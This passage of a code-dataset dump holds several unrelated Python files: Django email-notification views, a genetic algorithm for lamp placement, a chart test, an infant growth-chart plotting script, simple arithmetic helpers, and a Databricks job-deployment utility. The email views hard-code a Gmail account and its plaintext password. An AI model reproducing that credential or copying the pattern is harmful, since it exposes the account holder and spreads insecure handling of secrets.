server.quit()\n except smtplib.SMTPRecipientsRefused as e:\n print(e)\n\n\ndef send_email_cancel(student, theme):\n port = 465\n smtp_server = \"smtp.gmail.com\"\n sender_email = \"naukma.recording@gmail.com\"\n receiver_email = User.objects.get(pk=theme.teacher_offer.teacher_id).email\n password 
= 'naukma912'\n message = 'З Вашої теми \"' + theme.work_name + '\" виписався студент ' + User.objects.get(\n pk=student.pk).first_name\n context = ssl.create_default_context()\n try:\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(sender_email, receiver_email, message.encode('utf-8', 'ignore'))\n server.quit()\n except smtplib.SMTPRecipientsRefused as e:\n print(e)\n","sub_path":"AutomaticRecordingSystem/theme/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"640593824","text":"# Updated Animation Starter Code\nimport random\nimport math\nimport numpy \nimport copy\n\n\ndef runGeneration(lampsDict, numPeople, generations, data, mutationRate):\n newGen = []\n maxfit = None\n maxroom = None\n for i in range(generations):\n maxfit = None\n maxroom = None\n newGen = []\n print(\"generation %d out of %d\" % (i, generations))\n totalFitness = 0\n minFit = None\n for fitness in lampsDict:\n if minFit == None or fitness < minFit:\n minFit = fitness\n for fitness in lampsDict:\n totalFitness += fitness - minFit\n\n cumuProb = []\n rooms = []\n cumulativeProb = 0\n \n for fitness in lampsDict:\n newFit = fitness - minFit\n probability = (newFit/totalFitness)*100 + cumulativeProb\n cumulativeProb = probability\n cumuProb.append(probability)\n rooms.append(lampsDict[fitness])\n fitnesses = []\n trial = 1\n tempRooms = copy.deepcopy(rooms)\n while len(fitnesses) < numPeople:\n rooms = copy.deepcopy(tempRooms)\n print(\"Making baby %d out of %d\" % (len(fitnesses), numPeople))\n lampAndFitness = makeBaby(cumuProb, rooms, data, mutationRate)\n if lampAndFitness == None:\n print(\"Room did not survive, trial: %d\" % trial)\n trial += 1\n else:\n trial = 1\n newGen.append(lampAndFitness[0])\n fitnesses.append(lampAndFitness[1])\n lampsDict.clear()\n for i in range(len(newGen)):\n lampsDict[fitnesses[i]] = newGen[i]\n for fitIndex in lampsDict:\n if maxfit == None or fitIndex > maxfit:\n maxfit = fitIndex\n maxroom = lampsDict[fitIndex]\n\n print(\"MaxFit = %0.2f\" % maxfit)\n return maxroom\n\ndef checkBrightness500(lamps, data):\n BI = []\n for i in range(len(data.dots)):\n if dotInsideBox(data,data.dots[i]):\n continue\n index = brightNessIndex(data.dots[i], lamps, data) \n BI.append(index) \n if brightNessIndex(data.dots[i], lamps, data) == None:\n return [False]\n else:\n data.dots[i][2] = index\n return [True, BI]\n\ndef makeBaby(cumuProb, rooms, data, mutationRate):\n\n dad = random.random()*100\n #don't want them to be equal \n for i in range(len(cumuProb)):\n if cumuProb[i] > dad:\n dad = rooms[i]\n break\n mom = dad \n trialCount = 0\n while mom == dad:\n trialCount += 1\n #print(cumuProb)\n momIndex = random.random()*100\n for j in range(len(cumuProb)):\n if cumuProb[j] > momIndex:\n #print(cumuProb[j])\n mom = rooms[j]\n break\n if trialCount > 100:\n return None\n newLamps = set()\n brightnessForAllG500 = [False]\n while brightnessForAllG500[0] == False:\n randNum = random.randint(0,1)\n if len(dad) == 0:\n randNum = 1\n if len(mom) == 0:\n print(\"oops\")\n if len(mom) == 0:\n randNum = 0\n if randNum == 0:\n #select a lamp from dad\n randNum = random.randint(0,len(dad)-1)\n newLamps.add(dad[randNum])\n dad.pop(randNum)\n else:\n #select a lamp from mom\n randNum = random.randint(0,len(mom)-1)\n newLamps.add(mom[randNum])\n mom.pop(randNum)\n #check if all 500\n brightnessForAllG500 = 
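# Hedged aside on the Django views above: the two smtplib helpers hard-code
# Gmail credentials in source and assemble raw messages by hand. Django
# projects normally route this through django.core.mail, with credentials
# kept in settings (EMAIL_HOST, EMAIL_HOST_USER, ...). A minimal equivalent;
# the function name, subject, and message text are assumptions, and it needs
# configured EMAIL_* settings to run:
from django.core.mail import send_mail

def notify_teacher_of_record(student_name, teacher_email, work_name):
    send_mail(
        subject='New topic registration',
        message='Student {} signed up for your topic "{}"'.format(
            student_name, work_name),
        from_email=None,            # falls back to settings.DEFAULT_FROM_EMAIL
        recipient_list=[teacher_email],
        fail_silently=False,
    )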
checkBrightness500(list(newLamps), data)\n BI = brightnessForAllG500[1]\n\n newLamps = list(newLamps)\n #mutate lamps\n mutation = False\n for lamp in newLamps:\n #location \n randNum = random.randint(0,99)\n if randNum < mutationRate:\n mutation = True\n print(\"Mutation of location!\")\n x = lamp.x\n y = lamp.y\n inrange = False\n trialCounter = 0\n while inrange == False:\n trialCounter += 1\n newx = x + numpy.random.normal(scale = 10)\n newy = y + numpy.random.normal(scale = 10)\n if (newx > 5 and newx < 450) and (newy > 5 and newy < 450):\n inrange = True\n lamp.x = newx\n lamp.y = newy\n if trialCounter > 70:\n return None\n #brightness\n randNum = random.randint(0,99)\n if randNum < mutationRate:\n mutation = True\n print(\"Mutation of brightness!\")\n bright = lamp.lumens\n inrange = False\n trialCounter2 = 0\n while inrange == False:\n trialCounter2 += 1\n newbright = bright + numpy.random.normal(scale = 20)\n if (lamp.lumens > 1500 and lamp.lumens < 4000):\n inrange = True\n lamp.lumens = newbright\n if trialCounter2 > 70:\n return None\n if mutation:\n brightnessForAllG500 = checkBrightness500(newLamps, data)\n\n if brightnessForAllG500[0] == False:\n print(\"Mutation hurt offspring\")\n return None\n totalCost = []\n for lamp in data.lamps:\n totalCost.append(lamp.cost)\n standardDeviation = (numpy.std(BI))/22\n BIaverage = (sum(BI)/len(BI))/4\n cost = (sum(totalCost))/20016\n\n result = [BIaverage, standardDeviation, cost]\n BI = result[0]*1000\n SD = result[1]*1000\n C = result[2]*1000\n fit = BI - SD - C\n # [lamps, fitness]\n return [newLamps, fit]\n \n \n \n\n\nclass Lamp(object):\n def __init__(self, data):\n self.x = random.randint(5,450)\n self.y = random.randint(5,450)\n self.lumens = random.randint(1500, 4000)\n self.cost = (self.lumens-1500)/2500\n while dotInsideBox(data, [self.x,self.y]):\n self.x = random.randint(5,450)\n self.y = random.randint(5,450)\n def drawLamp(self,canvas):\n canvas.create_oval(self.x-4,self.y-4, self.x+4, self.y+4, width = self.lumens/2000, outline = \"red\", fill = \"yellow\")\n\n def __repr__(self):\n return \"Lamp at (%0.02f, %0.02f) with %d brightness and %0.1f cost\" % (self.x, self.y, self.lumens, self.cost)\n####################################\n# customize these functions\n####################################\n\n#check this again\ndef rectIntersect(tlx, tly, brx, bry, x1, y1, x2, y2):\n if x1 == x2:\n if x1 >= tlx and x1<= brx:\n return True\n if y1 == y2:\n if y1 >= tly and y1 <= bry:\n return True \n tlx, tly = tly, tlx\n brx, bry = bry, brx\n x1, y1 = y1, x1\n x2, y2 = y2, x2\n\n m = (y2-y1)/(x2-x1)\n b = y2-m*x2\n\n lefty = m*(tlx)+b\n righty = m*(brx)+b\n topx = (tly-b)/m\n botx = (bry-b)/m\n if (lefty <= tly and lefty >= bry) or (righty <= tly and righty >= bry):\n return True\n if (topx >= tlx and topx <= brx) or (botx >= tlx and botx <= brx):\n return True\n return False\n\ndef distFor(x1,y1,x2,y2):\n return math.sqrt((x1-x2)**2 + (y1-y2)**2)\n\n#dot = [x,y] \n#lamps = [lamp1, lamp2...]\ndef brightNessIndex(dot, lamps, data):\n totalBright = 0 \n for lamp in lamps:\n if not (rectIntersect(data.r1[0], data.r1[1], data.r1[2],data.r1[3],dot[0],dot[1],lamp.x,lamp.y) or rectIntersect(data.r2[0], data.r2[1], data.r2[2],data.r2[3],dot[0],dot[1],lamp.x,lamp.y) or rectIntersect(data.r3[0], data.r3[1], data.r3[2],data.r3[3],dot[0],dot[1],lamp.x,lamp.y)):\n distance = distFor(dot[0],dot[1], lamp.x, lamp.y)/500\n brightness = lamp.lumens/(4*math.pi*(distance**2))\n totalBright += brightness\n if totalBright < 500:\n return None\n 
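# Hedged illustration of the parent-selection scheme used by makeBaby() above:
# fitness-proportional (roulette-wheel) selection over a cumulative
# probability table, with the minimum fitness subtracted first as
# runGeneration() does. Self-contained toy version; the fitness values are
# invented, and it degenerates to picking the first item if all fitnesses tie.
import random
import bisect
import itertools

def roulette_pick(individuals, fitnesses):
    lo = min(fitnesses)
    weights = [f - lo for f in fitnesses]      # worst individual gets weight 0
    cumulative = list(itertools.accumulate(weights))
    r = random.uniform(0, cumulative[-1])
    return individuals[bisect.bisect_left(cumulative, r)]

print(roulette_pick(['room_a', 'room_b', 'room_c'], [10.0, 35.0, 55.0]))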
return (-math.atan(.02*(totalBright-500)) + math.pi/2)/1.5\n\ndef dotInsideBox(data, dot):\n return ((data.r1[0] <= dot[0] <= data.r1[2]) and (data.r1[1] <= dot[1] <= data.r1[3])) or ((data.r2[0] <= dot[0] <= data.r2[2]) and (data.r2[1] <= dot[1] <= data.r2[3])) or ((data.r3[0] <= dot[0] <= data.r3[2]) and (data.r3[1] <= dot[1] <= data.r3[3]))\n\nclass Struct(object): pass\ndata = Struct()\ndata.r1 = [300,300,350, 350]\ndata.r2 = [100,100,150, 150]\ndata.r3 = [350,150,400, 190]\n\n\n####################################\n# use the run function as-is\n####################################\n","sub_path":"generations.py","file_name":"generations.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"125140068","text":"import os\nfrom unittest import TestCase, main\nfrom gruffy import AccumulatorBar\n\nTARGET_FILE = 'test.png'\n\n\nclass TestAccumulatorBar(TestCase):\n\n def tearDown(self):\n os.remove(TARGET_FILE)\n\n def test_writable(self):\n g = AccumulatorBar()\n g.theme_pastel()\n g.theme_greyscale()\n\n g.data(\"test1\", [1, 2, 3])\n g.write(TARGET_FILE)\n\nif __name__ == '__main__':\n main()\n","sub_path":"test/test_accumulator_bar.py","file_name":"test_accumulator_bar.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"121106469","text":"# On importe les modules qui vont nous permettre de traiter les données\n\n# matplotlib pour réaliser les graphiques\n# import matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\n# csv pour lire les fichiers de données\nimport csv\n\n####Poids###\nxpoids5 = []\nypoids5 = []\nxpoids25 = []\nypoids25 = []\nxpoids50 = []\nypoids50 = []\nxpoids75 = []\nypoids75 = []\nxpoids95 = []\nypoids95 = []\nxmois_mesures = []\nymois_mesures = []\n\n### Récupération des mesures dans les fichiers à faire\n#Ouverture du fichier des normes de poids et stockage dans une liste absisses et une liste ordonnées\nwith open('./Docs-Projet/python-project-trackbaby/constantes-nourrissons-light/poids-age-garcon-0-60-light.csv', newline='') as csvfile:\n fichierlu = csv.reader(csvfile, delimiter=';')\n for row in fichierlu : \n if row[0] != 'Month' :\n xpoids5.append(int(row[0]))\n ypoids5.append(float(row[1]))\n\n xpoids25.append(int(row[0]))\n ypoids25.append(float(row[2]))\n\n xpoids50.append(int(row[0]))\n ypoids50.append(float(row[3]))\n\n xpoids75.append(int(row[0]))\n ypoids75.append(float(row[4]))\n\n xpoids95.append(int(row[0]))\n ypoids95.append(float(row[5]))\n\n#ouverture du fichier des mesures et stockage en 2 listes absisse et ordonnées des mesures de poids\nwith open('./Docs-Projet/python-project-trackbaby/mesures.csv', newline='') as csvfile:\n ficmesures = csv.reader(csvfile, delimiter=';')\n for row in ficmesures : \n if row[0] != 'Mois' :\n xmois_mesures.append(int(row[0]))\n ymois_mesures.append(float(row[1]))\n\n\n\n### Affichage du graphique du poids\nplt.subplot(1, 3, 1)\nplt.xlabel('Age en mois')\nplt.ylabel('Poids en kg')\nplt.plot(xpoids5,ypoids5, color='blue', label = '5% poids')\nplt.plot(xpoids25,ypoids25, color='orange', label = '25% poids')\nplt.plot(xpoids50,ypoids50, color='green', label = '50% poids')\nplt.plot(xpoids75,ypoids75, color='red', label = '75% poids')\nplt.plot(xpoids95,ypoids95, color='purple', label = '95% poids')\nplt.plot(xmois_mesures,ymois_mesures, marker='o', color='black')\nplt.legend()\n\nplt.grid()\n\n####Taille###\n\nxtaille5 = 
[]\nytaille5 = []\nxtaille25 = []\nytaille25 = []\nxtaille50 = []\nytaille50 = []\nxtaille75 = []\nytaille75 = []\nxtaille95 = []\nytaille95 = []\nxmois_mesuresT = []\nymois_mesuresT = []\n\n### Récupération des mesures dans les fichiers à faire\n#Ouverture du fichier des normes de taille et stockage dans une liste absisses et une liste ordonnées\nwith open('./Docs-Projet/python-project-trackbaby/constantes-nourrissons-light/taille-age-garcon-0-60-light.csv', newline='') as csvfile:\n fichierTlu = csv.reader(csvfile, delimiter=';')\n for row in fichierTlu : \n if row[0] != 'Month' :\n xtaille5.append(int(row[0]))\n ytaille5.append(float(row[1]))\n\n xtaille25.append(int(row[0]))\n ytaille25.append(float(row[2]))\n\n xtaille50.append(int(row[0]))\n ytaille50.append(float(row[3]))\n\n xtaille75.append(int(row[0]))\n ytaille75.append(float(row[4]))\n\n xtaille95.append(int(row[0]))\n ytaille95.append(float(row[5]))\n\n#ouverture du fichier des mesures et stockage en 2 listes absisse et ordonnées des mesures de taille\nwith open('./Docs-Projet/python-project-trackbaby/mesures.csv', newline='') as csvfile:\n ficmesuresT = csv.reader(csvfile, delimiter=';')\n for row in ficmesuresT : \n if row[0] != 'Mois' :\n xmois_mesuresT.append(int(row[0]))\n ymois_mesuresT.append(float(row[2]))\n\n\n### Affichage du graphique de la taille\n\nplt.subplot(1, 3, 2)\nplt.xlabel('Age en mois')\nplt.ylabel('Taille en cm')\nplt.plot(xtaille5,ytaille5, color='blue', label = '5% taille')\nplt.plot(xtaille25,ytaille25, color='orange', label = '25% taille')\nplt.plot(xtaille50,ytaille50, color='green', label = '50% taille')\nplt.plot(xtaille75,ytaille75, color='red', label = '75% taille')\nplt.plot(xtaille95,ytaille95, color='purple', label = '95% taille')\nplt.plot(xmois_mesuresT,ymois_mesuresT, marker='o', color='black')\nplt.legend()\n\nplt.grid()\n\n####TaillePérimètre cranien###\n\nxpc5 = []\nypc5 = []\nxpc25 = []\nypc25 = []\nxpc50 = []\nypc50 = []\nxpc75 = []\nypc75 = []\nxpc95 = []\nypc95 = []\nxmois_mesuresPC = []\nymois_mesuresPC = []\n\n### Récupération des mesures dans les fichiers à faire\n#Ouverture du fichier des normes de périmètre cranien et stockage dans une liste absisses et une liste ordonnées\nwith open('./Docs-Projet/python-project-trackbaby/constantes-nourrissons-light/perim-cra-age-garcon-0-60-light.csv', newline='') as csvfile:\n fichierPClu = csv.reader(csvfile, delimiter=';')\n for row in fichierPClu : \n if row[0] != 'Month' :\n xpc5.append(int(row[0]))\n ypc5.append(float(row[1]))\n\n xpc25.append(int(row[0]))\n ypc25.append(float(row[2]))\n\n xpc50.append(int(row[0]))\n ypc50.append(float(row[3]))\n\n xpc75.append(int(row[0]))\n ypc75.append(float(row[4]))\n\n xpc95.append(int(row[0]))\n ypc95.append(float(row[5]))\n\n#ouverture du fichier des mesures et stockage en 2 listes absisse et ordonnées des mesures de périmètre cranien\nwith open('./Docs-Projet/python-project-trackbaby/mesures.csv', newline='') as csvfile:\n ficmesuresPC = csv.reader(csvfile, delimiter=';')\n for row in ficmesuresPC : \n if row[0] != 'Mois' :\n xmois_mesuresPC.append(int(row[0]))\n ymois_mesuresPC.append(float(row[3]))\n\n\n### Affichage du graphique du périmètre cranien\nplt.subplot(1, 3, 3)\nplt.xlabel('Age en mois')\nplt.ylabel('Périmètre cranien en cm')\nplt.plot(xpc5,ypc5, color='blue', label = '5% périmètre cranien')\nplt.plot(xpc25,ypc25, color='orange', label = '25% périmètre craniene')\nplt.plot(xpc50,ypc50, color='green', label = '50% périmètre cranien')\nplt.plot(xpc75,ypc75, color='red', label = '75% 
périmètre cranien')\nplt.plot(xpc95,ypc95, color='purple', label = '95% périmètre cranien')\nplt.plot(xmois_mesuresPC,ymois_mesuresPC, marker='o', color='black')\nplt.legend()\n\nplt.grid()\nplt.show()","sub_path":"projet-etape2.py","file_name":"projet-etape2.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"464602428","text":"\ndef suma(a,b):\n\ttry:\n\t\tvar1 = a\n\t\tvar2 = b\n\t\treturn var1+var2\n\texcept TypeError:\n\t\treturn \"Error solo ingrese numeros\"\n\ndef resta(a,b):\n\ttry:\n\t\tvar1 = a\n\t\tvar2 = b\n\t\treturn var1-var2\n\texcept TypeError:\n\t\treturn \"Error solo ingrese numeros\"\n\ndef producto(a,b):\n\ttry:\n\t\tvar1 = a\n\t\tvar2 = b\n\t\tif type(var1*var2) is int:\n\t\t\treturn var1*var2\n\t\telif type(var1*var2) is float:\n\t\t\treturn var1*var2\n\t\telse:\n\t\t\treturn \"Solo ingrese numeros\"\n\texcept TypeError:\n\t\treturn \"Error solo ingrese numeros\"\n\ndef division(a,b):\n\ttry:\n\t\tvar1 = a\n\t\tvar2 = b\n\t\treturn var1/var2\n\texcept TypeError:\n\t\treturn \"Error solo ingrese numeros\"\n\texcept ZeroDivisionError:\n\t\treturn \"No se puede dividir por 0\"\n\n","sub_path":"Curso de Python de Cero a Maestro/Ejercicios/operaciones.py","file_name":"operaciones.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"489585223","text":"from typing import Dict, List, Tuple, Any, Union\nfrom uuid import uuid1\nfrom time import sleep\nimport base64\nimport os\nimport shutil\nimport subprocess\nimport re\nimport requests\n\n\ndef call_get(url: str, headers: Dict[str, str], params: Dict[str, str] = None, error_message: str = None) \\\n -> requests.models.Response:\n r = requests.get(url, headers=headers, params=params)\n if r.status_code != 200:\n raise Exception(f'{error_message}, {r.status_code}, {r.reason}, {r.text}')\n return r\n\n\ndef call_post(url: str, headers: Dict[str, str] = None, json: Dict = None, data: Dict = None, files: Dict = None,\n error_message: str = None, exceptions_not_allowed: bool = True) -> requests.models.Response:\n r = requests.post(url, headers=headers, json=json, data=data, files=files)\n if r.status_code != 200 and exceptions_not_allowed:\n raise Exception(f'{error_message}, {r.status_code}, {r.reason}, {r.text}')\n return r\n\n\ndef run_scheduled_job(env: str, job_keyword: str, override_envs: Dict[str, Any], deploy_config: Dict[str, Any]) -> int:\n # Todo: inject env into job name to look only for given env jobs / select run cluster based on env\n print(env)\n existing_jobs = list_existing_jobs(deploy_config['deploy_url'])\n if not existing_jobs:\n raise Exception('No runnable jobs found')\n matching_jobs = [j for j in existing_jobs if job_keyword in j['settings']['name'] and\n env in j['settings']['name']]\n if not matching_jobs:\n raise Exception(f'No jobs found with keyword {job_keyword}')\n selected_job = 0\n if len(matching_jobs) > 1:\n selected_job = int(input(f'Enter the sequence of the job you want to run'\n f' (0-{len(matching_jobs) - 1}, default: 0): '))\n if not selected_job:\n selected_job = 0\n runnable_job = matching_jobs[selected_job]\n print(f'Selected job: {runnable_job}')\n\n data = {\"job_id\": runnable_job['job_id']}\n if override_envs:\n data['notebook_params'] = override_envs\n headers = {\"content-type\": \"application/json\"}\n\n url = f'{deploy_config[\"deploy_url\"]}/jobs/run-now'\n r = call_post(url, 
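# Hedged refactoring sketch for the growth-chart script above (its French
# comments describe plotting weight / height / head-circumference percentile
# curves plus the baby's measurements). The three near-identical CSV-reading
# blocks collapse naturally into one helper; the 'Month' header and ';'
# delimiter come from the script itself, the helper name is an assumption.
import csv

def load_percentiles(path):
    """Return (months, {column_index: values}) for a percentile CSV whose
    columns 1..5 hold the 5/25/50/75/95th-percentile curves."""
    months, curves = [], {i: [] for i in range(1, 6)}
    with open(path, newline='') as f:
        for row in csv.reader(f, delimiter=';'):
            if row[0] == 'Month':
                continue
            months.append(int(row[0]))
            for i in curves:
                curves[i].append(float(row[i]))
    return months, curves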
headers=headers, json=data, error_message='Error while attempting to run notebook')\n print('Job started successfully')\n return r.json()['run_id']\n\n\ndef list_existing_jobs(url_prefix: str) -> List[Dict[str, Any]]:\n url = f'{url_prefix}/jobs/list'\n headers = {\"content-type\": \"application/json\"}\n r = call_get(url, headers=headers, error_message='Error while fetching existing job definitions')\n return r.json()['jobs']\n\n\ndef parse_email_notifications(env: str, email_settings: Dict[str, Any]) -> Dict[str, Union[str, List[str]]]:\n try:\n env_mails = email_settings['ENV_TARGET_EMAILS'][env]\n except KeyError:\n raise Exception(f'No runtime env {env} defined in deployfile: {email_settings}')\n accepted_states = ['on_start', 'on_success', 'on_failure']\n if any(x.lower() not in accepted_states for x in email_settings['ALERT_ON_STATES']):\n raise Exception(f'Given state alerts {email_settings[\"ALERT_ON_STATES\"]} contains invalid states.'\n f'Accepted values: {accepted_states}')\n email_notifications = {state_change.lower(): env_mails for state_change in email_settings['ALERT_ON_STATES']}\n if 'ALERT_SKIPPED_RUNS' in email_settings:\n # Some ugly code here. Databricks asks funnily phrased bool \"no_alert_for_.....\"\n # more clear to ask bool for alert_for.. ‾\\_(ツ)_/‾\n given_bool = str(email_settings['ALERT_SKIPPED_RUNS']).lower()\n if given_bool not in ('true', 'false'):\n raise Exception(f'Invalid value given for ALERT_SKIPPED_RUNS: {given_bool}.'\n f'Accepted values: [\"true\", \"false\"], no case sensitivity')\n bool_converted = given_bool == 'true'\n email_notifications['no_alert_for_skipped_runs'] = str(not bool_converted).lower()\n return email_notifications\n\n\ndef delete_existing_job(url_prefix: str, job_name) -> None:\n existing_jobs = list_existing_jobs(url_prefix)\n if not existing_jobs:\n return\n matching_jobs = [j for j in existing_jobs if j['settings']['name'] == job_name]\n if not matching_jobs:\n return\n print(f'Found {len(matching_jobs)} matching job names, overwriting')\n job_ids = [job['job_id'] for job in matching_jobs]\n\n headers = {\"content-type\": \"application/json\"}\n url = f'{url_prefix}/jobs/delete'\n for job_id in job_ids:\n data = {'job_id': job_id}\n r = call_post(url, headers=headers, json=data, error_message='Error while deleting old job definition')\n\n\ndef apply_job_scheduling(env: str, url_prefix: str, job_config: Dict[str, Any]) -> None:\n job_name = f\"base_schedule_{job_config['parsed_job_name']}\"\n delete_existing_job(url_prefix, job_name)\n\n headers = {\"content-type\": \"application/json\"}\n url = f'{url_prefix}/jobs/create'\n\n data = {\"existing_cluster_id\": job_config['cluster_id'],\n \"notebook_task\": {\"notebook_path\": job_config['absolute_job_path'],\n \"base_parameters\": {\"ENVIRONMENT\": env}},\n \"name\": job_name,\n # max_retries, # NOT IN USE\n # min_retry_interval_millis, NOT IN USE\n # retry_on_timeout, NOT IN USE\n \"timeout_seconds\": f\"{60 * 60 * 12}\",\n \"schedule\":\n {\"quartz_cron_expression\": f\"{job_config['SCHEDULE_EXPRESSION']}\",\n \"timezone_id\": \"Europe/Helsinki\"},\n \"max_concurrent_runs\": 10}\n if 'EMAIL_NOTIFICATIONS' in job_config:\n data['email_notifications'] = parse_email_notifications(env, job_config['EMAIL_NOTIFICATIONS'])\n r = call_post(url, headers=headers, json=data, error_message='Job scheduling error')\n print('Scheduling applied successfully')\n\n\ndef inject_matching_cluster_id(cluster_location: str, env: str, cluster: str) -> str:\n cluster_with_env = f'{cluster}_{env}'\n 
headers = {\"content-type\": \"application/json\"}\n url = f'{cluster_location}/clusters/list'\n r = call_get(url, headers=headers, error_message='Error while fetching existing clusters')\n all_clusters = r.json().get('clusters', '')\n if not all_clusters:\n raise Exception(f'No existing clusters found')\n matching_clusters = [c for c in all_clusters if c['cluster_name'] == cluster_with_env]\n if not matching_clusters:\n raise Exception(f'No clusters found with given identifier {cluster_with_env}')\n selected_cluster = 0\n if len(matching_clusters) > 1:\n selected_cluster = int(input(f'Enter the sequence of the cluster you want to deploy the job in'\n f' (0-{len(matching_clusters) - 1}, default: 0): '))\n if not selected_cluster:\n selected_cluster = 0\n print(f'Selected cluster: {matching_clusters[selected_cluster]}')\n return matching_clusters[selected_cluster]['cluster_id']\n\n\ndef push_code_to_databricks(url_prefix: str, job_config: Dict[str, Any]) -> None:\n headers = {\"content-type\": \"application/json\"}\n data = {\"path\": f\"{job_config['absolute_job_path']}\",\n \"format\": f\"{job_config['FORMAT']}\",\n \"language\": f\"{job_config['LANGUAGE']}\",\n \"content\": f\"{job_config['encoded_code']}\",\n \"overwrite\": \"true\"}\n url = f'{url_prefix}/workspace/import'\n r = call_post(url, headers=headers, json=data, error_message='Error in notebook deployment')\n print('Notebook deployed successfully')\n\n\ndef convert_code_to_base64(file: str) -> str:\n with open(file, 'rb') as f:\n code = str(base64.b64encode(f.read()), 'utf-8')\n return code\n\n\ndef inject_job_path(env: str, job_config: Dict[str, Any]) -> Tuple[str, str]:\n job_service_name = job_config.get('JOB_NAME', '')\n target_job_name = job_service_name if job_service_name else job_config['JOB_TO_DEPLOY'].replace('.py', '')\n target_job_name = f'{target_job_name}-{env}'\n return f\"{job_config['TARGET_DIRECTORY']}/{target_job_name}\", target_job_name\n\n\ndef get_latest_maven_artifact(requirement_name: str) -> str:\n artifact_parts = requirement_name.split(':')\n if len(artifact_parts) != 3:\n raise ValueError(f'Given maven artifact {requirement_name} is invalid, '\n f'must be in format GROUP:ARTIFACT:VERSION')\n group_id = artifact_parts[0]\n artifact_id = artifact_parts[1]\n\n url = 'https://repository.sonatype.org/service/local/artifact/maven/redirect'\n headers = {\"content-type\": \"application/json\"}\n params = {\"r\": \"central-proxy\",\n \"g\": group_id,\n \"a\": artifact_id,\n \"v\": \"LATEST\"}\n r = call_get(url, headers=headers, params=params, error_message='Error in maven version check')\n url_parts = r.url.split('/')\n if not re.search(r'[^0-9.]', url_parts[-2]):\n return url_parts[-2]\n raise Exception(f'Unable to find latest version for artifact {requirement_name}: {r.url}')\n\n\ndef subproc_run(*args, **kwargs):\n return subprocess.run(*args, **kwargs, check=True).check_returncode()\n\n\ndef artifact_install_present(coordinate_to_install: List[str], existing_artifact_versions: List[List[str]]) -> bool:\n # If coordinate == existing, same version is on cluster\n # If coordinate version is less than existing coordinate in case that coordinate G:A == existing G:A, new version\n # is on the cluster\n return any(coordinate_to_install == existing or\n (coordinate_to_install[2] < existing[2] and coordinate_to_install[:2] == existing[:2])\n for existing in existing_artifact_versions)\n\n\ndef ensure_cluster_is_running(deploy_url: str, cluster_id: str) -> None:\n cluster_url_prefix = f'{deploy_url}/clusters'\n 
data = {\"cluster_id\": cluster_id}\n\n def _is_cluster_running(cluster_url_prefix: str, data: Dict[str, str]):\n headers = {\"content-type\": \"application/json\"}\n r = call_get(f'{cluster_url_prefix}/get', headers=headers, params=data,\n error_message='Error in cluster status update')\n if r.json()['state'] == 'RUNNING':\n return True\n return False\n\n if not _is_cluster_running(cluster_url_prefix, data):\n print('Cluster not running, starting')\n headers = {\"content-type\": \"application/json\"}\n r = call_post(url=f'{cluster_url_prefix}/start', headers=headers, json=data, error_message='Starting cluster')\n print('Start command successful')\n while not _is_cluster_running(cluster_url_prefix, data):\n print('Waiting for cluster to start')\n sleep(5)\n\n\ndef deploy_requirements_to_databricks(deploy_url: str, cluster_id: str, requirements: List[Dict[str, Any]]) -> None:\n print('Checking previous installs on cluster')\n cluster_status_url = f'{deploy_url}/libraries/cluster-status'\n headers = {\"content-type\": \"application/json\"}\n params = {\"cluster_id\": cluster_id}\n r = call_get(cluster_status_url, headers=headers, params=params, error_message='Error in checking cluster status')\n previously_installed = r.json()\n\n final_requirements: List[Dict[str, Any]] = []\n existing_artifact_versions = []\n if any('maven' in x['library'] for x in previously_installed.get('library_statuses', {})):\n existing_artifact_versions = [x['library']['maven']['coordinates'].split(':')\n for x in previously_installed['library_statuses']\n if 'maven' in x['library'] and x['status'] == 'INSTALLED']\n for requirement in requirements:\n # TODO: check local repos + pypi + jar versions somehow to avoid reinstalls if possible\n if 'maven' in requirement:\n coordinate_splitted = requirement['maven']['coordinates'].split(':')\n if not artifact_install_present(coordinate_splitted, existing_artifact_versions):\n final_requirements.append(requirement)\n else:\n final_requirements.append(requirement)\n\n if len(final_requirements) == 0:\n print('Nothing left to install on cluster')\n return\n\n # Cluster needs to be running for installs to work :(\n ensure_cluster_is_running(deploy_url, cluster_id)\n\n url = f'{deploy_url}/libraries/install'\n data = {'cluster_id': cluster_id, 'libraries': final_requirements} # type: ignore\n r = call_post(url, headers=headers, json=data, error_message='Failure in requirements installation')\n print('Libs installed successfully')\n\n\ndef _parse_private_repositories(deploy_url: str, requirements: Dict[str, Any]) -> List[Dict[str, str]]:\n url = f'{deploy_url}/dbfs/put'\n target_install_path = requirements['target_install_path']\n\n required_repos: List[Dict[str, str]] = []\n for repo in requirements['repolist']:\n path_safety_word = str(uuid1())\n copy_path = f'{os.curdir}/{path_safety_word}'\n subproc_run(['git', 'clone', repo, copy_path], cwd=os.curdir, env=os.environ)\n subproc_run(['python3', 'setup.py', 'bdist_egg'], cwd=copy_path)\n egg_path_prefix = f'{copy_path}/dist'\n egg_file = os.listdir(egg_path_prefix)[0]\n current_head = subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode().strip()\n full_install_path = f\"{target_install_path}/{current_head}_{egg_file}\"\n payload = {\"path\": full_install_path}\n files = {\"file\": open(f'{egg_path_prefix}/{egg_file}', 'rb')}\n r = call_post(url, data=payload, files=files, exceptions_not_allowed=False)\n if r.status_code == 400 and r.json().get('error_code') == 'RESOURCE_ALREADY_EXISTS':\n print(f'Current commit 
